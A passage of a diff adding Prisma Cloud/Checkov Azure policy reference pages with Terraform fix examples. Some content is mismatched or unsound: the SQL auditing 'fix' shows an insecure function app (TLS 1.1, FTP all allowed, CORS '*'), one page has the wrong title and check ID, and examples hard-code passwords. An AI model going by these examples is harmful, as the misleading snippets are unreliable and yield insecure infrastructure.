= azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id + sql_administrator_login = "sqladminuser" + sql_administrator_login_password = "H@Sh1CoR3!" + managed_virtual_network_enabled = false + data_exfiltration_protection_enabled = true + aad_admin { + login = "AzureAD Admin" + object_id = "00000000-0000-0000-0000-000000000000" + tenant_id = "00000000-0000-0000-0000-000000000000" + } + + + tags = { + Env = "production" + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc new file mode 100644 index 000000000..2705ae12b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc @@ -0,0 +1,63 @@ +== Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0 + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0199900b-03d9-4dc3-9d6b-272289f74a57 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py[CKV_AZURE_150] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Setting the minimum number of nodes for your Azure Machine Learning Compute Clusters to 0 can help reduce the cost of running the cluster when it is not in use. +When the minimum number of nodes is set to 0, the cluster is scaled down to 0 nodes when it is not in use, and no resources are consumed. +By setting the minimum number of nodes to 0, you can ensure that the cluster is not consuming resources when it is not in use, which can help reduce your costs. +This can be especially useful if you only need to use the cluster occasionally or on an as-needed basis. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_machine_learning_compute_cluster +* *Arguments:* scale_settings.min_node_count + + +[source,go] +---- +{ + "resource "azurerm_machine_learning_compute_cluster" "ckv_unittest_pass" { + name = "example" + location = "West Europe" + vm_priority = "LowPriority" + vm_size = "Standard_DS2_v2" + machine_learning_workspace_id = azurerm_machine_learning_workspace.example.id + subnet_resource_id = azurerm_subnet.example.id + + scale_settings { + min_node_count = 0 + max_node_count = 1 + scale_down_nodes_after_idle_duration = "PT30S" # 30 seconds + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc new file mode 100644 index 000000000..98358604c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc @@ -0,0 +1,74 @@ +== Azure PostgreSQL Flexible Server does not enable geo-redundant backups + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9777c0b0-c852-452b-bc68-9b8da93b222a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py[CKV_AZURE_136] + +|Severity +|LOW + +|Subtype +|Build +//,Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Azure PostgreSQL Flexible Server allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. +When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. +This provides better protection and ability to restore your server in a different region in the event of a disaster. +//// +=== Fix - Runtime +TBA +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_flexible_server +* *Arguments:* geo_redundant_backup_enabled + + +[source,go] +---- +{ + "resource "azurerm_postgresql_flexible_server" "pass" { + name = "example-psqlflexibleserver" + resource_group_name = "azurerm_resource_group.example.name" + location = "azurerm_resource_group.example.location" + version = "12" + delegated_subnet_id = "azurerm_subnet.example.id" + private_dns_zone_id = "azurerm_private_dns_zone.example.id" + administrator_login = "psqladmin" + administrator_password = "H@Sh1CoR3!" + zone = "1" + + storage_mb = 32768 + geo_redundant_backup_enabled = true + + sku_name = "GP_Standard_D4s_v3" + depends_on = ["azurerm_private_dns_zone_virtual_network_link.example"] + +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags.adoc new file mode 100644 index 000000000..4e46a418a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags.adoc @@ -0,0 +1,319 @@ +== Azure resources that support tags do not have tags + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cbdcfe66-249f-4e7b-8184-eb8b77b33b49 + +|Checkov Check ID +|CKV_AZURE_CUSTOM_1 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Many different types of Azure resources support tags. +Tags allow you to add metadata to a resource to help identify ownership, perform cost / billing analysis, and to enrich a resource with other valuable information, such as descriptions and environment names. +While there are many ways that tags can be used, we recommend you follow a tagging practice. +View Microsoft's recommended tagging best practices https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging[here]. + + +[source,text] +---- +{ + "azurerm_analysis_services_server +azurerm_api_management +azurerm_api_management_named_value +azurerm_api_management_property +azurerm_app_configuration +azurerm_app_service +azurerm_app_service_certificate +azurerm_app_service_certificate_order +azurerm_app_service_environment +azurerm_app_service_managed_certificate +azurerm_app_service_plan +azurerm_app_service_slot +azurerm_application_gateway +azurerm_application_insights +azurerm_application_insights_web_test +azurerm_application_security_group +azurerm_attestation_provider +azurerm_automation_account +azurerm_automation_dsc_configuration +azurerm_automation_runbook +azurerm_availability_set +azurerm_backup_policy_vm +azurerm_backup_protected_vm +azurerm_bastion_host +azurerm_batch_account +azurerm_bot_channels_registration +azurerm_bot_connection +azurerm_bot_web_app +azurerm_cdn_endpoint +azurerm_cdn_profile +azurerm_cognitive_account +azurerm_communication_service +azurerm_container_group +azurerm_container_registry +azurerm_container_registry_webhook +azurerm_cosmosdb_account +azurerm_custom_provider +azurerm_dashboard +azurerm_data_factory +azurerm_data_lake_analytics_account', +azurerm_data_lake_store +azurerm_data_share_account +azurerm_database_migration_project +azurerm_database_migration_service +azurerm_databox_edge_device +azurerm_databricks_workspace +azurerm_dedicated_hardware_security_module +azurerm_dedicated_host +azurerm_dedicated_host_group +azurerm_dev_test_global_vm_shutdown_schedule +azurerm_dev_test_lab +azurerm_dev_test_linux_virtual_machine +azurerm_dev_test_policy +azurerm_dev_test_schedule +azurerm_dev_test_virtual_network +azurerm_dev_test_windows_virtual_machine +azurerm_devspace_controller +azurerm_digital_twins_instance +azurerm_disk_access +azurerm_disk_encryption_set +azurerm_dns_a_record +azurerm_dns_aaaa_record +azurerm_dns_caa_record +azurerm_dns_cname_record +azurerm_dns_mx_record +azurerm_dns_ns_record +azurerm_dns_ptr_record +azurerm_dns_srv_record +azurerm_dns_txt_record +azurerm_dns_zone +azurerm_eventgrid_domain +azurerm_eventgrid_system_topic +azurerm_eventgrid_topic +azurerm_eventhub_cluster +azurerm_eventhub_namespace +azurerm_express_route_circuit +azurerm_express_route_gateway +azurerm_express_route_port +azurerm_firewall +azurerm_firewall_policy', +azurerm_frontdoor +azurerm_frontdoor_firewall_policy +azurerm_function_app +azurerm_function_app_slot +azurerm_hdinsight_hadoop_cluster +azurerm_hdinsight_hbase_cluster +azurerm_hdinsight_interactive_query_cluster +azurerm_hdinsight_kafka_cluster +azurerm_hdinsight_ml_services_cluster +azurerm_hdinsight_rserver_cluster +azurerm_hdinsight_spark_cluster +azurerm_hdinsight_storm_cluster +azurerm_healthcare_service +azurerm_hpc_cache +azurerm_image +azurerm_integration_service_environment +azurerm_iot_security_solution +azurerm_iot_time_series_insights_gen2_environment +azurerm_iot_time_series_insights_reference_data_set +azurerm_iot_time_series_insights_standard_environment +azurerm_iotcentral_application +azurerm_iothub +azurerm_iothub_dps +azurerm_ip_group +azurerm_key_vault +azurerm_key_vault_certificate +azurerm_key_vault_key +azurerm_key_vault_secret +azurerm_kubernetes_cluster +azurerm_kubernetes_cluster_node_pool +azurerm_kusto_cluster +azurerm_lb +azurerm_linux_virtual_machine +azurerm_linux_virtual_machine_scale_set +azurerm_local_network_gateway +azurerm_log_analytics_cluster +azurerm_log_analytics_linked_service +azurerm_log_analytics_saved_search +azurerm_log_analytics_solution +azurerm_log_analytics_storage_insights +azurerm_log_analytics_workspace +azurerm_logic_app_integration_account +azurerm_logic_app_workflow +azurerm_machine_learning_workspace +azurerm_maintenance_configuration +azurerm_managed_application +azurerm_managed_application_definition +azurerm_managed_disk +azurerm_management_group_template_deployment +azurerm_maps_account +azurerm_mariadb_server +azurerm_media_live_event +azurerm_media_services_account +azurerm_media_streaming_endpoint +azurerm_monitor_action_group +azurerm_monitor_action_rule_action_group +azurerm_monitor_action_rule_suppression +azurerm_monitor_activity_log_alert +azurerm_monitor_autoscale_setting +azurerm_monitor_metric_alert +azurerm_monitor_scheduled_query_rules_alert +azurerm_monitor_scheduled_query_rules_log +azurerm_monitor_smart_detector_alert_rule +azurerm_mssql_database +azurerm_mssql_elasticpool +azurerm_mssql_server +azurerm_mssql_virtual_machine +azurerm_mysql_server +azurerm_nat_gateway +azurerm_netapp_account +azurerm_netapp_pool +azurerm_netapp_snapshot +azurerm_netapp_volume +azurerm_network_connection_monitor +azurerm_network_ddos_protection_plan +azurerm_network_interface +azurerm_network_profile +azurerm_network_security_group +azurerm_network_watcher +azurerm_notification_hub +azurerm_notification_hub_namespace +azurerm_orchestrated_virtual_machine_scale_set +azurerm_point_to_site_vpn_gateway +azurerm_postgresql_server +azurerm_powerbi_embedded +azurerm_private_dns_a_record +azurerm_private_dns_aaaa_record +azurerm_private_dns_cname_record +azurerm_private_dns_mx_record +azurerm_private_dns_ptr_record +azurerm_private_dns_srv_record +azurerm_private_dns_txt_record +azurerm_private_dns_zone +azurerm_private_dns_zone_virtual_network_link +azurerm_private_endpoint +azurerm_private_link_service +azurerm_proximity_placement_group +azurerm_public_ip +azurerm_public_ip_prefix +azurerm_purview_account +azurerm_recovery_services_vault +azurerm_redis_cache +azurerm_redis_enterprise_cluster +azurerm_relay_namespace +azurerm_resource_group +azurerm_resource_group_template_deployment +azurerm_route_filter +azurerm_route_table +azurerm_search_service +azurerm_security_center_automation +azurerm_service_fabric_cluster +azurerm_service_fabric_mesh_application +azurerm_service_fabric_mesh_local_network +azurerm_service_fabric_mesh_secret +azurerm_service_fabric_mesh_secret_value +azurerm_servicebus_namespace +azurerm_shared_image +azurerm_shared_image_gallery +azurerm_shared_image_version +azurerm_signalr_service +azurerm_snapshot +azurerm_spatial_anchors_account +azurerm_spring_cloud_service +azurerm_sql_database +azurerm_sql_elasticpool +azurerm_sql_failover_group +azurerm_sql_server +azurerm_ssh_public_key +azurerm_stack_hci_cluster +azurerm_storage_account +azurerm_storage_sync +azurerm_stream_analytics_job +azurerm_subnet_service_endpoint_storage_policy +azurerm_subscription +azurerm_subscription_template_deployment +azurerm_synapse_spark_pool +azurerm_synapse_sql_pool +azurerm_synapse_workspace +azurerm_tenant_template_deployment +azurerm_traffic_manager_profile +azurerm_user_assigned_identity +azurerm_virtual_desktop_application_group +azurerm_virtual_desktop_host_pool +azurerm_virtual_desktop_workspace +azurerm_virtual_hub +azurerm_virtual_hub_security_partner_provider +azurerm_virtual_machine +azurerm_virtual_machine_extension +azurerm_virtual_machine_scale_set +azurerm_virtual_network +azurerm_virtual_network_gateway +azurerm_virtual_network_gateway_connection +azurerm_virtual_wan +azurerm_vmware_private_cloud +azurerm_vpn_gateway +azurerm_vpn_server_configuration +azurerm_vpn_site +azurerm_web_application_firewall_policy +azurerm_windows_virtual_machine +azurerm_windows_virtual_machine_scale_set", + +} +---- + +=== Fix - Buildtime + + +*Terraform* + + +The example below shows how to tag a security group in Terraform. +The syntax is generally the same for any taggable resource type. + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_managed_disk" "example" { + name = "acctestmd" + location = "West US 2" + resource_group_name = azurerm_resource_group.example.name + storage_account_type = "Standard_LRS" + create_option = "Empty" + disk_size_gb = "1" + ++ tags = { ++ environment = "staging" + } + +} +", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured.adoc new file mode 100644 index 000000000..f99a241cc --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured.adoc @@ -0,0 +1,74 @@ +== Azure SQL Server does not have default auditing policy configured + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b72f2db-1338-4575-9a05-59bcced0e34b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py[CKV_AZURE_156] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Configuring a default auditing policy for your Azure SQL Server can help improve the security and management of your database. +Auditing allows you to keep a record of events and activities that have occurred on your database, such as user logins, data changes, and other actions. + + +*Runtime - Buildtime* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app +* *Arguments:* enable_builtin_logging + + +[source,go] +---- +{ + "resource "azurerm_function_app" "pass2" { + name = "test-azure-functions" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + storage_account_name = azurerm_storage_account.example.name + storage_account_access_key = azurerm_storage_account.example.primary_access_key + https_only = false + enable_builtin_logging = true + + site_config { + dotnet_framework_version = "v4.0" + scm_type = "LocalGit" + min_tls_version = 1.1 + ftps_state = "AllAllowed" + http2_enabled = false + cors { + allowed_origins = ["*"] + } + + } +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc new file mode 100644 index 000000000..fda10046d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc @@ -0,0 +1,59 @@ +== Azure Virtual machine enables password authentication + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 34dd5f50-7505-4002-a8ca-05f63e053479 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py[CKV_AZURE_149] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling password authentication for your Azure virtual machine (VM) can help improve the security of your VM. +Password authentication allows users to access the VM using a password, rather than an Azure Active Directory (Azure AD) account or other form of authentication. +By disabling password authentication, you can help prevent unauthorized access to your VM and protect it from potential security threats such as data breaches or unauthorized access. +Instead, you should use more secure forms of authentication such as Azure AD, SSH keys, or multi-factor authentication. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_linux_virtual_machine_scale_set +* *Arguments:* disable_password_authenticatio + + +[source,go] +---- +{ + "resource "azurerm_linux_virtual_machine_scale_set" "pass" { + name = var.scaleset_name + resource_group_name = var.resource_group.name + location = var.resource_group.location + sku = var.sku + instances = var.instance_count + admin_username = var.admin_username + disable_password_authentication = true + tags = { test = "Fail" } +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc new file mode 100644 index 000000000..bbfc810c6 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc @@ -0,0 +1,87 @@ +== Storage Account name does not follow naming rules + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f06c6dbe-be9e-4966-b9ac-18fbe7f016c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By default, all data at rest in an Azure Cognitive Services account is encrypted using Microsoft Managed Keys. +It is recommended to use Customer Managed Keys to encrypt data in Azure Cognitive Services accounts for better control of the data access. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cognitive_account, azurerm_cognitive_account_customer_managed_key, azurerm_key_vault, azurerm_key_vault_key + + +[source,go] +---- +{ + "data "azurerm_client_config" "current" {} + +resource "azurerm_key_vault" "example" { + name = "examplekv" + location = "location" + resource_group_name = "group" + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "standard" + + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_key" "example" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.example.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] +} + + + +resource "azurerm_cognitive_account" "cognitive_account_good" { + name = "example-account" + resource_group_name = "group" + location = "location" + kind = "Face" + sku_name = "E0" + +} + + +resource "azurerm_cognitive_account_customer_managed_key" "good_cmk" { + cognitive_account_id = azurerm_storage_account.cognitive_account_good.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled.adoc new file mode 100644 index 000000000..b447ad16f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled.adoc @@ -0,0 +1,58 @@ +== Azure App Services FTP deployment is All allowed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7fa164f0-fb0d-40a1-8293-8192f64eed81 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py[CKV_AZURE_78] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +FTPS (Secure FTP) is used to enhance security for Azure web application using App Service as it adds an extra layer of security to the FTP protocol, and help you to comply with the industry standards and regulations. +For enhanced security, it is highly advices to use FTP over TLS/SSL only. +You can also disable both FTP and FTPS if you don't use FTP deployment. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* ftps_state - (Optional) State of FTP / FTPS service for this App Service. + +Possible values include: AllAllowed, FtpsOnly and Disabled. + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ ftps_state = "FtpsOnly" +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..84ec97986 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,55 @@ +== MSSQL is not using the latest version of TLS encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b65c4ddf-6ece-4fd5-8ffc-3ce85343fc40 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py[CKV_AZURE_52] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers over the internet using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your MSSQL servers. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mssql_server +* *Arguments:* minimum_tls_version + + +[source,go] +---- +{ + " resource "azurerm_mssql_server" "examplea" { + ... + + minimum_tls_version = "1.2" + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..c332b40c7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,52 @@ +== MySQL is not using the latest version of TLS encryption + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a27abd50-b6c4-41bd-9395-72fa70b69185 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py[CKV_AZURE_54] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your MySQL servers. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* ssl_minimal_tls_version_enforced + + +[source,go] +---- +{ + " resource "azurerm_mysql_server" "examplea" { + ... + + ssl_minimal_tls_version_enforced = "TLS1_2" + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected.adoc new file mode 100644 index 000000000..51f7edb5e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected.adoc @@ -0,0 +1,118 @@ +== Azure Microsoft Defender for Cloud Defender plans is set to Off + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c221ce81-99df-487e-8c05-4329335e9f9a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py[CKV_AZURE_19] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +The standard pricing tier enables threat detection for networks and virtual machines and allows greater defense-in-depth. +It provides threat intelligence, anomaly detection, and behavior analytics in the Azure Security Center. +Threat detection is provided by the Microsoft Security Response Center (MSRC). +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to the * Azure Security Center*. + +. Select * Security policy* blade. + +. To alter the the security policy for a subscription, click * Edit Settings*. + +. Select * Pricing tier* blade. + +. Select * Standard*. + +. Select * Save*. + + +* CLI Command* + + +To set the * Pricing Tier* to * Standard*, use the following command: + + +[source,shell] +---- +{ + "az account get-access-token +--query +"{subscription:subscription,accessToken:accessToken}" +--out tsv | xargs -L1 bash -c 'curl -X PUT -H "Authorization: Bearer $1" -H "Content-Type: +application/json" +https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/pr +icings/default?api-version=2017-08-01-preview -d@"input.json"'", +} +---- + +Where * input.json* contains the * Request body json data*, detailed below. + + +[source,shell] +---- +{ + "{ + "id": +"/subscriptions/& lt;Your_Subscription_Id>/providers/Microsoft.Security/pricings/ +default", + "name": "default", + "type": "Microsoft.Security/pricings", + "properties": { + "pricingTier": "Standard" + } + +}", + +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* tier + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + - tier = "Free" + + tier = "Standard" +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc new file mode 100644 index 000000000..b3dc3ce75 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc @@ -0,0 +1,114 @@ +== Storage for critical data are not encrypted with Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 03752d85-99fb-4972-87b7-7d10db4cfd59 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml[CKV2_AZURE_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable sensitive data encryption at rest using Customer Managed Keys (CMKs) rather than Microsoft Managed keys. +By default, data in the storage account is encrypted using Microsoft Managed Keys at rest. +All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. +All object metadata is also encrypted. +However, if you want to control and manage this encryption key yourself, you can specify a customer-managed key, that key is used to protect and control access to the key that encrypts your data. +You can also choose to automatically update the key version used for Azure Storage encryption whenever a new version is available in the associated Key Vault. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_key_vault, azurerm_key_vault_access_policy, azurerm_key_vault_key, azurerm_storage_account, azurerm_storage_account_customer_managed_key + + +[source,go] +---- +{ + "data "azurerm_client_config" "current" {} + +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_key_vault" "example" { + name = "examplekv" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "standard" + + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_access_policy" "client" { + key_vault_id = azurerm_key_vault.example.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id + + key_permissions = ["get", "create", "delete", "list", "restore", "recover", "unwrapkey", "wrapkey", "purge", "encrypt", "decrypt", "sign", "verify"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_key" "example" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.example.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] + + depends_on = [ + azurerm_key_vault_access_policy.client + ] +} + + + +resource "azurerm_storage_account" "ok_storage_account" { + name = "examplestor" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + account_tier = "Standard" + account_replication_type = "GRS" + + identity { + type = "SystemAssigned" + } + +} + + +resource "azurerm_storage_account_customer_managed_key" "ok_cmk" { + storage_account_id = azurerm_storage_account.ok_storage_account.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc new file mode 100644 index 000000000..71d158c01 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc @@ -0,0 +1,53 @@ +== Active Directory is not used for authentication for Service Fabric + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a34620b2-df70-4dfc-964d-dde263c6c80f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py[CKV_AZURE_125] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A Service Fabric cluster requires creating Azure Active Directory (AD) applications to control access to the cluster: one web application and one native application. +After the applications are created, you will be required to assign users to read-only and admin roles. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_service_fabric_cluster +* *Arguments:* azure_active_directory - (Optional) An azure_active_directory block as defined below. + + +[source,go] +---- +resource "azurerm_service_fabric_cluster" "example" { + ... + + azure_active_directory { + + tenant_id = "tenant" + } + ... + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files.adoc new file mode 100644 index 000000000..606287e59 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files.adoc @@ -0,0 +1,58 @@ +== App services do not use Azure files +// App services do not use Azure Files + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5fffbe0b-dafe-4774-b8de-dad2231047c3 + +|Checkov Check ID +| 